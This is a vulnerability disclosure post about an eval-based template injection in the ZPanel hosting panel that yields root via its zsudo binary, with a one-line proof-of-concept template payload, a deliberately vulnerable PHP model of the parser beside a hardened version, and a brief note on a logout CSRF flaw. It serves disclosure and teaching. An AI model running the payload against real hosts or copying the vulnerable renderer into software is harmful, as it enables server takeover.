There's an arbitrary (PHP) code execution vulnerability in ZPanel, a free and open-source shared hosting control panel. Using the included zsudo binary, access can be escalated and commands can be run as root.
The vulnerability: ZPanel uses a poor "templater" system that basically consists of a few str_replace calls and an eval... and as could be expected from something like this, it does a very poor job at preventing malicious code. The relevant code can be seen here: https://github.com/bobsta63/zpanelx/blob/master/dryden/ui/templateparser.class.php (note the poor attempt at stripping out <?php and ?> tags).
By injecting into the replacement that occurs on line 71, one can run arbitrary PHP code. When combined with ZPanel's zsudo binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments (aside from the path to the command to be executed).

The scope: Custom templates/themes can be uploaded by resellers and administrators. This effectively means that anyone who can get access to a reseller account through any means, including by purchasing a reseller service from a ZPanel-using host, can gain root access, without detection.
PoC: Insert the following code anywhere in master.ztml or any other template that is parsed by the template parser, replacing the touch /root/derp command with any command of choice:
<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo $value['bogus &>
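To make the mechanism concrete, here is an added example (my own illustration, not ZPanel's code) that models the pattern the post describes: tag contents are spliced into PHP source by a string replacement and the result is eval'd. The exact replacement string and tag syntax in ZPanel's templateparser.class.php differ from this simplified model, so treat the vulnerable function as an assumption about the shape of the bug rather than a copy of it. The hardened function next to it shows the fix a practitioner would want: only identifier-shaped tag names are accepted, and the value is written to the output as escaped data rather than executed.

```php
<?php
// Added example, not ZPanel's code. The vulnerable function is an ASSUMED,
// simplified model of "a few str_replace calls and an eval"; the real
// parser's replacement string differs.

// Vulnerable model: each <& name &> tag becomes the PHP expression
// $value['name'] inside a string that is then eval'd. Nothing is escaped,
// so a tag body containing '] breaks out of the string literal and any
// PHP that follows runs with the web server's privileges.
function render_vulnerable(string $template, array $value): string
{
    $php = preg_replace_callback(
        '/<&\s*(.*?)\s*&>/s',
        function ($m) {
            // Tag contents are spliced straight into code. No validation.
            return "<?php echo \$value['" . $m[1] . "']; ?>";
        },
        $template
    );
    ob_start();
    // Leading "?>" drops eval() into HTML mode so the rewritten template
    // (markup plus <?php ... ?> blocks) executes as a normal PHP file would.
    eval('?>' . $php);
    return ob_get_clean();
}

// Hardened version: the tag name must be identifier-shaped, the lookup is
// done in PHP (not in generated code), and the value is HTML-escaped before
// it is written into the document. There is no eval at all, so template
// authors (resellers, in ZPanel's case) cannot run code on the server.
function render_safe(string $template, array $value): string
{
    return preg_replace_callback(
        '/<&\s*([A-Za-z0-9_]+)\s*&>/',
        function ($m) use ($value) {
            return htmlspecialchars((string)($value[$m[1]] ?? ''), ENT_QUOTES, 'UTF-8');
        },
        $template
    );
}

// Constructed sample input. The payload has the same shape as the PoC above,
// with a harmless echo standing in for the zsudo exec() call.
$value   = ['x' => 'hello'];
$benign  = "Hi <& x &>!";
$payload = "<& x']; echo 'PWNED'; echo \$value['x &>";

echo render_vulnerable($benign, $value), "\n";
echo render_vulnerable($payload, $value), "\n";
echo render_safe($benign, $value), "\n";
echo render_safe($payload, $value), "\n";
```

Run it with the PHP CLI. The vulnerable renderer prints the injected marker because the tag body closed the `$value['...']` string and appended its own statements, exactly the break-out the PoC relies on. The hardened renderer leaves a malformed tag in the output untouched (its strict name pattern does not match `x']; echo ...`), and even a well-formed tag can only ever produce escaped text. The broader point for ZPanel is that stripping `<?php` and `?>` from a template is not a fix: once template text reaches eval, the attacker controls PHP syntax, not just PHP tags.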
I've posted the full post to the full-disclosure mailing list: http://seclists.org/fulldisclosure/2013/Apr/28
Seriously, guys. Stop using ZPanel. It's terribly insecure. How many times do I have to say this?
Bonus: there's a CSRF vulnerability in the logout mechanism.